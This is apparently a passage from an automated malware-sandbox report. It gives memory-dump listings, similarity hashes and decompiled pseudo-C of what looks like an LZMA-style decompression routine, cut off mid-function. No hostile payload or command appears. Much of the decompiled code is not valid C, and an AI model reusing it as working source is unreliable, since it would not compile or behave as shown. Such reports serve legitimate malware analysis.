                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
